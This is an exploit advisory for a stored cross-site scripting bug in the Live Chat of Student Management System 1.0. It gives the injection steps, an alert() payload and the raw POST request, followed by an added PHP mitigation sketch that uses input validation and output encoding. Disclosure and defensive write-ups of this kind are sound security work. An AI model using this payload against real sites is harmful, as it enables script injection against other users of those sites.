# Exploit Title: Student Management System 1.0 - 'message' Persistent Cross-Site Scripting (Authenticated)
# Date: 2021-05-13
# Exploit Author: mohsen khashei (kh4sh3i) or kh4sh3i@gmail.com
# Vendor Homepage: https://github.com/amirhamza05/Student-Management-System
# Software Link: https://github.com/amirhamza05/Student-Management-System/archive/refs/heads/master.zip
# Version: 1.0
# Tested on: ubuntu 20.04.2

# --- Description --- #

# The web application allows an attacker to inject a persistent Cross-Site Scripting payload in Live Chat.

# --- Proof of concept --- #

1- Login to Student Management System
2- Click on Live Chat button
3- Inject this payload and send : <image src=1 onerror="javascript:alert(document.domain)"></image>
4- XSS popup will be triggered.

# --- Malicious Request --- #

POST /nav_bar_action.php HTTP/1.1
Host: (HOST)
Cookie: (PHPSESSID)
Content-Length: 96

send_message_chat%5Bmessage%5D=<image src=1 onerror="javascript:alert(document.domain)"></image>
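
# --- Mitigation sketch (added example) --- #

Added example, not code from the application or from the advisory author: one way to close this class of bug is to store the chat message as received and encode it for the context it is written into. The function names, the 2000-byte limit and the response shapes are assumptions; only the `send_message_chat[message]` parameter and the sample string come from the request above.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers: the application's real chat code is not shown in the advisory.
const CHAT_MAX_BYTES = 2000; // assumed limit, not taken from the application

/** Validate the raw POST value. The message is stored unmodified and encoded only on output. */
function chat_accept_message(array $post): ?string
{
    $msg = $post['send_message_chat']['message'] ?? null;
    if (!is_string($msg)) {
        return null;                        // missing value or nested array
    }
    $msg = trim($msg);
    if ($msg === '' || strlen($msg) > CHAT_MAX_BYTES) {
        return null;
    }
    if (preg_match('//u', $msg) !== 1) {    // reject invalid UTF-8
        return null;
    }
    return $msg;
}

/** Encode for an HTML element context so markup in the message is shown as text. */
function chat_render_html(string $msg): string
{
    return '<div class="chat-msg">'
        . htmlspecialchars($msg, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8')
        . '</div>';
}

/** Encode for a JSON response that client-side script will read. */
function chat_render_json(string $msg): string
{
    return json_encode(
        ['message' => $msg],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

// Constructed input: the message from the request above, as PHP would parse the POST body.
$post = ['send_message_chat' => ['message' =>
    '<image src=1 onerror="javascript:alert(document.domain)"></image>']];

$msg = chat_accept_message($post);
if ($msg !== null) {
    echo chat_render_html($msg), PHP_EOL;   // tags appear as literal text in the chat window
    echo chat_render_json($msg), PHP_EOL;   // angle brackets and quotes emitted as \uXXXX escapes
}
```

If the chat window is filled from the JSON response, the client should assign the value with `textContent` rather than `innerHTML`, since JSON escaping alone does not make the decoded string safe as markup.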